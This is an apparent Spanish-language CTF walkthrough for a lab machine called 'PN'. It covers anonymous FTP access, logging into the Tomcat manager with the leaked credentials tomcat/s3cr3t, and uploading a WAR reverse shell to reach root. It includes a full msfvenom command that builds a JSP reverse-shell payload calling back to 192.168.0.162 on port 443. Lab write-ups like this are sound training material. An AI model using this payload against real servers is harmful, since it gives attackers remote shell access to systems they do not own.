MAQUINA PN (EXPLOIT UPLOAD .WAR TOMCAT - RCE 'MSFVENOM')
Last updated
Last updated
Iniciamos la maquina.
Hacemos un ping a la ip para ver si tenemos conectividad, el ttl al ser 64 puede indicar que nos estamos enfrentando a una maquina Linux
Una vez que tengamos la ip usamos nmap para ver los servicios y puertos que corren en la maquina:
El reporte de NMAP nos muestra que en el puerto ftp podemos loguearnos como anonymous entramos dentro sin proporcionar contraseña.
Una vez dentro nos descargamos el archivo tomcat.txt
El archivo tomcat.txt nos proporciona un usuario llamado "tomcat"
Ahora entramos al servidor web que corren en el puerto 8080.
Una vez ingresado vamos al apartado donde dice "manager webapp":
Esto nos va a redirigir a un inicio de sesion el cual vamos a utilizar las siguiente credenciales:
user: tomcat password: s3cr3t
Ya estamos dentro del tomcat.
Hay una opción donde vamos a poder subir un archivo .war.
Para ellos vamos a usar msfvenom para crear nuestro payload: Este no funciona, pero hay que probar.
Este si funciona
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.162 LPORT=443 -f war > reverse.war
Lista de payload msfvenom:
Una vez subido nos va a aparecer en el inicio, así que con en otra terminal nos ponemos en escucha con netcat y le damos 1 click y esperamos
Listo somos usuario root.